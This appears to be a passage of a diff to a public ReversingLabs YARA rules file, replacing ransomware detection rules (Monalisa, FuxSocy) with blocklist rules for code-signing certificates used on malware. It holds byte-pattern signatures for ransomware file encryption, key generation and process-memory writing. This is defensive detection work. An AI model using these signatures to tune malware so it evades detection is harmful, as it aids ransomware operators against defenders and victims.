?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 - ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? - 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? - 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 - 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? - ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 - 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD - E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_p1 = { - FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43 55 ?? 03 CA 89 85 ?? ?? ?? ?? - 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 - 7F ?? ?? 72 ?? 8B 3F 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? - ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 - ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? 83 7D ?? ?? 8D 4D ?? 66 89 85 ?? ?? ?? ?? 0F 43 4D ?? 8B 45 ?? 03 C1 C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B F0 83 7E ?? ?? 72 ?? 8B 36 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? - ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 - C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 50 6A ?? 68 ?? ?? ?? ?? 57 8B 3D ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? FF D7 89 85 ?? ?? ?? ?? 83 - F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF - D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C9 BA - } - $encrypt_files_p2 = { - 8D 40 ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ?? - ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 03 CA 89 85 ?? ?? ?? ?? 83 3D ?? ?? ?? - ?? ?? B8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 51 50 8B CE E8 ?? ?? ?? - ?? A1 ?? ?? ?? ?? 83 C4 ?? 33 C9 68 ?? ?? ?? ?? 6A ?? 56 66 89 0C 46 8D 85 ?? ?? ?? - ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 - 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? - ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 - C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 42 - 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? - 0F 86 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? - FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? - 8D 45 ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF 33 F6 57 FF B5 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 - } - $encrypt_files_p3 = { - 8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F8 8D 85 ?? ?? ?? ?? 3B - BD ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 0F 44 F1 50 6A ?? 56 6A ?? FF B5 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 - FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 - ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? - ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - B9 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? - ?? 8B 35 ?? ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? - ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 - 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $find_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 33 C0 89 - 85 ?? ?? ?? ?? 38 47 ?? 0F 85 ?? ?? ?? ?? 8B 07 8B 08 8D 85 ?? ?? ?? ?? 50 8D 49 ?? - E8 ?? ?? ?? ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 8B 07 8B 08 8D 85 ?? ?? - ?? ?? 50 8D 49 ?? E8 ?? ?? ?? ?? 83 38 ?? 0F 84 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ?? - 8B 30 8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 46 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? - ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? - ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 - ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 07 8B - 30 8B 46 ?? 8B 00 85 C0 74 ?? 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 83 C4 ?? 66 83 38 ?? 75 ?? 8B 46 ?? FF 30 FF 15 ?? ?? ?? ?? 8B 46 ?? 83 C4 - ?? C7 00 ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D - 4E ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? C6 45 ?? ?? 81 7F ?? ?? ?? ?? ?? 8B 37 8B 36 75 ?? 68 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 8B 46 ?? 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D 4F ?? 50 E8 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="7b:75:c6:b0:a0:9a:fd:b9:78:7f:6d:ff:75:ae:78:44" and 1476662400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "42cf5f07-4c43-567c-a517-42c898658ab8" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13782-L13798" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1cc7d441291fd9c4dc37320d411f94fb362523d47d37ab35c20b3ac9d4cd75cb" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="16:7f:d1:29:5b:3b:b1:02:db:b3:72:92:c8:38:e7:cd" and 1476921600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Monalisa : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE { meta: - description = "Yara rule that detects Monalisa ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "34addb63-2426-59a2-b79b-052a9161d361" - date = "2022-05-13" - modified = "2022-05-13" + id = "f09ca101-dd40-54d8-9235-1faf1e774dd4" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Monalisa.yara#L1-L83" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0bcb79dff111ec05ac93bbe9a777546bd6234dc60d9f6982c03cd0bc3b26b038" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13800-L13816" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1d46ccaa136cd7be30ffbf0eb09eb6485c543ff4bdbe99fa7ea3846841cbd41b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Monalisa" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 A1 ?? ?? ?? ?? 33 - C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B CC 89 65 - ?? 8D 45 ?? B3 ?? 51 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 33 C0 6A - ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 E8 ?? ?? ?? ?? - 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8A D3 88 5D ?? 8B CE E8 ?? ?? - ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? - ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? - 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? - ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3 - } - $write_proc_mem = { - 8D 45 ?? 50 FF 76 ?? 8B 46 ?? 03 C7 50 8B 06 03 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? - 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 3E 0F B7 41 ?? 48 3B D8 75 ?? 8B 51 ?? - EB ?? 8B 4D ?? 8B 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 56 ?? 8B 4E ?? 2B D7 8B C1 25 ?? - ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? - ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? - ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ?? - ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 85 C9 - B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 48 C1 8D 4D ?? 51 50 8B 45 ?? 52 03 C7 50 FF 75 ?? - FF 15 - } - $encrypt_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 50 - 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? - ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 51 0F 43 05 ?? ?? ?? ?? 50 6A ?? 68 ?? - ?? ?? ?? 51 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 05 ?? ?? ?? ?? ?? ?? ?? - ?? 0F 10 00 0F 11 05 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 05 ?? ?? ?? ?? C7 40 ?? ?? - ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 89 08 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? - ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 - ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 - 89 0D ?? ?? ?? ?? 59 8B E5 5D C3 - } - $generate_key = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 75 ?? - 8B 0C 88 A1 ?? ?? ?? ?? 3B 81 ?? ?? ?? ?? 7F ?? 56 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? - ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? - 75 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? - 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 45 ?? 50 E8 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DVERI FADO, TOV" and pe.signatures[i].serial=="25:3a:d2:5e:39:ab:e8:f8:fd:a9:fc:f6" and 1538662130<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "b21365d0-eaff-51da-8b8e-6a6ee75a5b95" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13818-L13836" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "87e314d14361f56935b7a8fb93468cfaf2c73e16c25d68a61ec80ad9334d3115" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($write_proc_mem) and ($generate_key) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ULTERA" and (pe.signatures[i].serial=="00:a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" or pe.signatures[i].serial=="a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87") and 1499731200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Fuxsocy : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE { meta: - description = "Yara rule that detects FuxSocy ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f4a45469-9d51-523f-8238-c7044f353cf6" - date = "2021-03-01" - modified = "2021-03-01" + id = "e17bf185-3dfc-5a2f-a87f-525ac0e4084b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.FuxSocy.yara#L1-L114" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8b3c04eb5d60fcc82e47cb8e78da0a98642666546d6799baef24b56926e3aceb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13838-L13854" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8e88ad992c58d37ff1ac34e2d9cf121f3bc692ae78c0ad79140974abdec2f317" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "FuxSocy" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_1 = { - 83 EC ?? 53 55 57 89 54 24 ?? 8B 54 24 ?? 51 33 DB E8 ?? ?? ?? ?? 8B E8 59 85 ED 0F - 84 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CB E9 - ?? ?? ?? ?? 53 53 FF 74 24 ?? 41 FF 74 24 ?? BF ?? ?? ?? ?? FF 74 24 ?? 3B C7 0F 42 - F8 2B C7 89 4C 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ?? - FF 74 24 ?? FF 15 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 54 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? - 59 59 57 8D 44 24 ?? 50 FF 74 24 ?? 33 C0 39 44 24 ?? 53 0F 94 C0 89 7C 24 ?? 50 53 - 55 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ?? - ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 01 7C 24 ?? - 8B 4C 24 ?? 11 5C 24 ?? F6 C1 ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24 - ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 88 5C 24 ?? FF 74 24 ?? 8B 54 24 ?? 8B 4C 24 ?? E8 - ?? ?? ?? ?? 59 8B 4C 24 ?? 55 89 41 ?? FF 15 ?? ?? ?? ?? 8A 5C 24 ?? 5F 5D 8A C3 5B - 83 C4 ?? C3 - } - $encrypt_files_2 = { - 83 EC ?? 53 55 56 8B 74 24 ?? 8B C1 8B 36 57 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? - 8B F8 33 D2 8D 5F ?? 8B C6 F7 F3 33 C9 85 D2 0F 95 C1 89 54 24 ?? 33 D2 03 C8 89 4C - 24 ?? 0F AF CF 89 4C 24 ?? E8 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84 ?? ?? ?? ?? - 33 D2 8B CF E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 64 24 ?? ?? - 48 89 6C 24 ?? 89 44 24 ?? 74 ?? 53 FF 74 24 ?? 89 5C 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 44 24 ?? 57 50 56 33 C0 50 50 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 33 C9 85 FF 74 ?? 8B 54 24 ?? 8D 6E ?? 03 EF 8A 45 ?? 4D 88 04 11 41 3B CF - 72 ?? 8B 6C 24 ?? 8B 44 24 ?? 03 44 24 ?? 01 5C 24 ?? 89 44 24 ?? 8B 44 24 ?? 40 89 - 44 24 ?? 3B 44 24 ?? 72 ?? 8B 44 24 ?? 85 C0 0F 45 D8 53 FF 74 24 ?? 89 5C 24 ?? 56 - E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 57 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF 15 ?? - ?? ?? ?? 8B D8 F7 DB 1A DB 80 E3 ?? 33 C9 85 FF 74 ?? 8B 6C 24 ?? 8D 56 ?? 03 D7 8A - 02 4A 88 04 29 41 3B CF 72 ?? 8B 6C 24 ?? 8B CE E8 ?? ?? ?? ?? 84 DB 75 ?? 8B CD E8 - ?? ?? ?? ?? 33 ED EB ?? 32 DB EB ?? 8B 4C 24 ?? 8B 44 24 ?? 89 01 5F 5E 8B C5 5D 5B - 83 C4 ?? C3 - } - $find_files_1 = { - 81 EC ?? ?? ?? ?? 53 56 57 8B BC 24 ?? ?? ?? ?? 8B F2 89 74 24 ?? 8B D9 85 FF 0F 84 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B D7 C1 E2 ?? 8B - CE E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 - 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 - 0F 84 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B E8 - 83 FD ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44 - 24 ?? 83 E0 ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 75 ?? 85 C0 75 ?? F6 84 24 ?? ?? ?? ?? - ?? 74 ?? 33 F6 85 FF 74 ?? 8B 44 24 ?? FF 34 B0 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 - C0 75 ?? 46 3B F7 72 ?? EB ?? FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 94 24 ?? ?? - ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? F6 44 24 ?? ?? 74 ?? 